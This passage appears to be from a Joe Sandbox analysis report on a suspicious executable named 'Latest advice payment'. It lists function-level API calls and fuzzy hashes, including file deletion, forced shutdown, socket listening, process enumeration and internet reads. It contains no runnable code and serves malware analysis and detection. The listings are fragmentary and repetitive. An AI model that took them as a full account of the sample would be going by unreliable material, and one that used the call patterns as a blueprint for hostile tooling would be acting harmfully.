                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 35dd2cbaa7190d808ee6f2488cc0e226919cdea25d537b1b9fd87455de6729de
                                                            • Instruction ID: ed8259485f823d2ea740df6691a3fd6cc7aa6dfb4832db6cd5b6924852483739
                                                            • Opcode Fuzzy Hash: 35dd2cbaa7190d808ee6f2488cc0e226919cdea25d537b1b9fd87455de6729de
                                                            • Instruction Fuzzy Hash: 5A516A3180514EAECB05EBE0D996EEDBB79BF64304F608069E446771A1EF316F09CB61
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005CF440
                                                            • Sleep.KERNEL32(0000000A), ref: 005CF470
                                                            • _wcscmp.LIBCMT ref: 005CF484
                                                            • _wcscmp.LIBCMT ref: 005CF49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 005CF53D
                                                            • FindClose.KERNEL32(00000000), ref: 005CF553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: ada3be673e61b883fcdd2c127b070f7328d09c17aedf7dc9aa284202d78c6f1b
                                                            • Instruction ID: 4ac4b499e738f359d6112d9a2c0c118b7a2907d9c2d385bf2ca9e597fd977e94
                                                            • Opcode Fuzzy Hash: ada3be673e61b883fcdd2c127b070f7328d09c17aedf7dc9aa284202d78c6f1b
                                                            • Instruction Fuzzy Hash: 64415A7190024AAFCF14DFA4DC89BEEBFB5FF45310F14446AE955A7190EB309A88CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID: 3cW$_W
                                                            • API String ID: 674341424-1067530677
                                                            • Opcode ID: 51422983c3ca322f15aa4aa27cc63cca3337ea1d37c10eca4ccdb9066fed04f2
                                                            • Instruction ID: f63d161dfd93cb02b9e5f9fb03bd17d05e76003bf3623841b71e5c946bf5cd40
                                                            • Opcode Fuzzy Hash: 51422983c3ca322f15aa4aa27cc63cca3337ea1d37c10eca4ccdb9066fed04f2
                                                            • Instruction Fuzzy Hash: 18228B716083019FCB24DF14D895B6EBBE9BFC5720F04891CF89A97291DB71E904DB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 7461842e429de19e548c23c1c200ded759b8fee900d23a915d9e7bc6bf95dbd6
                                                            • Instruction ID: 1c429f6b8cb1e0c703086f8957a9c26fb757c4e14cbfbddc2cb9f8c3b26a3839
                                                            • Opcode Fuzzy Hash: 7461842e429de19e548c23c1c200ded759b8fee900d23a915d9e7bc6bf95dbd6
                                                            • Instruction Fuzzy Hash: 8612A070A0060ADFDF14DFA4D985AEEBBF5FF88310F108529E44AE7290EB35A914DB50
                                                            APIs
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                              • Part of subcall function 005C4A31: GetFileAttributesW.KERNEL32(?,005C370B), ref: 005C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005C3B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 005C3BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005C3BEA
                                                            • FindClose.KERNEL32(00000000), ref: 005C3C01
                                                            • FindClose.KERNEL32(00000000), ref: 005C3C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: a27dc153fea4d319a2230993efaa271d300679e424e075cc7cbdbcc3a684f110
                                                            • Instruction ID: 22fef488c503b2d03e50b9760cb35fa73c6b914e1c218ea44f134132f8f8a867
                                                            • Opcode Fuzzy Hash: a27dc153fea4d319a2230993efaa271d300679e424e075cc7cbdbcc3a684f110
                                                            • Instruction Fuzzy Hash: F8317E3100838A9FC304EB64C895DAFBBA8BEA5304F404E2DF4D593191EB209E08CB97
                                                            APIs
                                                              • Part of subcall function 005B87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005B882B
                                                              • Part of subcall function 005B87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005B8858
                                                              • Part of subcall function 005B87E1: GetLastError.KERNEL32 ref: 005B8865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 005C51F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: 89bcea6adce24ba47f41c2624399508b7cb3bb2209e9b597050bc6913094366e
                                                            • Instruction ID: 5a19bca6a1e5ddce69da626bdf39168167589202a68da5582a76a1803c7d9869
                                                            • Opcode Fuzzy Hash: 89bcea6adce24ba47f41c2624399508b7cb3bb2209e9b597050bc6913094366e
                                                            • Instruction Fuzzy Hash: 8C01D8396916115FE72852E89C8EFBA7ADCF744350F540829F953D60D2F9513C809590
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005D62DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D62EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 005D6307
                                                            • listen.WSOCK32(00000000,00000005), ref: 005D6316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D6330
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 005D6344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: a36a8f4c837807c7522f916c31b5078c3a038295956c08fe2b7f6885cdeeeb85
                                                            • Instruction ID: ed707d69dc36e5899382f8a59fcc996e1a51e04286a85ad70171de112cb51747
                                                            • Opcode Fuzzy Hash: a36a8f4c837807c7522f916c31b5078c3a038295956c08fe2b7f6885cdeeeb85
                                                            • Instruction Fuzzy Hash: F021E6756002159FCB10EF68C889B6EBBA9FF88310F14455AF856973D1CB70AD05DB51
                                                            APIs
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                            • _memmove.LIBCMT ref: 005B0258
                                                            • _memmove.LIBCMT ref: 005B036D
                                                            • _memmove.LIBCMT ref: 005B0414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 59cdeb0e0bd119e5d7f56f70025f6319718e269f6440b6c9c07c7535bdda415e
                                                            • Instruction ID: 546253ac3adfba8b7cdc08851852458a29c52788fe40b196de8de04834adfbb2
                                                            • Opcode Fuzzy Hash: 59cdeb0e0bd119e5d7f56f70025f6319718e269f6440b6c9c07c7535bdda415e
                                                            • Instruction Fuzzy Hash: 9802B170A0020ADBCF04DF64D985AAEBFF5FF84300F148469E80ADB295EB75E954CB91
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 005619FA
                                                            • GetSysColor.USER32(0000000F), ref: 00561A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00561A61
                                                              • Part of subcall function 00561290: DefDlgProcW.USER32(?,00000020,?), ref: 005612D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 7454d296f906d40ab1ef06bb5c720b5bc1787f328db5203b732ccfc0111eadc4
                                                            • Instruction ID: 6d692f71765441cae0eea459850f6905be13af0ed8b5bf89c2e0cefbb8d5ffde
                                                            • Opcode Fuzzy Hash: 7454d296f906d40ab1ef06bb5c720b5bc1787f328db5203b732ccfc0111eadc4
                                                            • Instruction Fuzzy Hash: 0BA18971112D85BEFB38AB799D48D7F2E5DFB82346B1C051AF002C7192CA249D01D2FA
                                                            APIs
                                                              • Part of subcall function 005D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005D7DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005D679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D67C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 005D6800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D680D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 005D6821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: c047ada1a00ea1815f9d867ce4bfc0c2358f4ef40c1ce36ed01a90cc712ff88f
                                                            • Instruction ID: f39fca58d60bd05de24ad38ea32671f886bbf99dae6216596e9423ae3be0e42e
                                                            • Opcode Fuzzy Hash: c047ada1a00ea1815f9d867ce4bfc0c2358f4ef40c1ce36ed01a90cc712ff88f
                                                            • Instruction Fuzzy Hash: 4141E375A00215AFDB20AF688C8AF7E7BE8FB98714F048559F955AB3C2CA709D018791
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 85df868971bc72fdd09a7687f938b72c5c9ee28f177844fc289313f4e8c42c29
                                                            • Instruction ID: c9a72fbe57d13914f1c10596eb5cd448a4f497620c7b5805eb3deedf08174a67
                                                            • Opcode Fuzzy Hash: 85df868971bc72fdd09a7687f938b72c5c9ee28f177844fc289313f4e8c42c29
                                                            • Instruction Fuzzy Hash: 4111E6717005515BEB245F279C88A6A7F98FF983A5B404839F885D7241DF709C018BA0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005B80C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005B80CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005B80D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005B80E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005B80F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 6561318025cef81178068eef824c43decb543a91b30a26fc3f88834a40a61e93
                                                            • Instruction ID: 5b9e75afee06ff5dff8a33ab951599f1579c943c8a2b92ebb8e81894e7083b4c
                                                            • Opcode Fuzzy Hash: 6561318025cef81178068eef824c43decb543a91b30a26fc3f88834a40a61e93
                                                            • Instruction Fuzzy Hash: B7F04431241244AFD7144F65DCCDEB73FACFF89755B000025F545C6150CE619D45EB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ddb$Ddb$Ddb$Ddb$Variable must be of type 'Object'.
                                                            • API String ID: 0-1193501972
                                                            • Opcode ID: 954b5e3ab2e8e27692984f1ec7577c725ab55b49dc2cd5462dca0903b621fed1
                                                            • Instruction ID: 5b4a5aea0bc52817bacbd63e706266e112f8ed90b642e85461769eb34a645d7d
                                                            • Opcode Fuzzy Hash: 954b5e3ab2e8e27692984f1ec7577c725ab55b49dc2cd5462dca0903b621fed1
                                                            • Instruction Fuzzy Hash: A7A29078A01215CFCB24CF98C485AAEBFB6FF59314F248469E905AB351D771ED82CB90
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 005CC432
                                                            • CoCreateInstance.OLE32(005F2D6C,00000000,00000001,005F2BDC,?), ref: 005CC44A
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • CoUninitialize.OLE32 ref: 005CC6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 58eb3dea2ba026d68c595ee0e81394e0862bb7bdbc0f639d984237371399e8a1
                                                            • Instruction ID: 0d3f913c91393890ad61b276fe8b183528ee26f79c4575243bae44d05a9b1c36
                                                            • Opcode Fuzzy Hash: 58eb3dea2ba026d68c595ee0e81394e0862bb7bdbc0f639d984237371399e8a1
                                                            • Instruction Fuzzy Hash: A0A11AB1104206AFD700EF54C895EABBBECFFD9354F00491CF1959B192EB71AA49CB52
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00564AD0), ref: 00564B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00564B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: ff73d3a8cad4aff0e59ffec7cf79c2400608998be05306063235c250ddc16019
                                                            • Instruction ID: 32abbb5ff2a29f9240db311423f18496ab2a09eab49e675c1e0dd154f7a14f61
                                                            • Opcode Fuzzy Hash: ff73d3a8cad4aff0e59ffec7cf79c2400608998be05306063235c250ddc16019
                                                            • Instruction Fuzzy Hash: 21D01234A10757CFDB289F32D858B067AD8BF55351B11C83D94C5DA160DA70D4C0CB54
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 005DEE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 005DEE4B
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 005DEF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 005DEF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 8e206a880be93cd8fb6a29f41a38ddb826ded59850e85f0cad2243a4790d943f
                                                            • Instruction ID: 79bda13aba78f302329f1ce94870c5471cced564a604261f36d59ef90b833cdc
                                                            • Opcode Fuzzy Hash: 8e206a880be93cd8fb6a29f41a38ddb826ded59850e85f0cad2243a4790d943f
                                                            • Instruction Fuzzy Hash: D2518171504316AFD320EF24C886E6BBBE8FFD4710F50491EF595972A1EB709904CB92
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005BE628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: f53e394cd4a1090e3486445e977075cbeb21a162645df92994e71a7ff96e048e
                                                            • Instruction ID: 85349022936549a703e76ec587e5b9b29c73471bfa1e7cf8f968c9b65c45140b
                                                            • Opcode Fuzzy Hash: f53e394cd4a1090e3486445e977075cbeb21a162645df92994e71a7ff96e048e
                                                            • Instruction Fuzzy Hash: 46322575A007059FD728DF19D4829AABBF1FF48310B15C56EE89ADB3A1EB70E941CB40
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005D180A,00000000), ref: 005D23E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 005D2418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: a741341949bc5caa9d2edca337740294d7a52002eca83278ad8dc6173112dde6
                                                            • Instruction ID: 5a7b00049e1b79793ddefd65027bcb6d1568d0a50919e7f7075d714832c01405
                                                            • Opcode Fuzzy Hash: a741341949bc5caa9d2edca337740294d7a52002eca83278ad8dc6173112dde6
                                                            • Instruction Fuzzy Hash: 6E41B471904209BFEF30DE99DC85EBBBBACFB90314F10446BFA41A6240EA759E459760
                                                            APIs
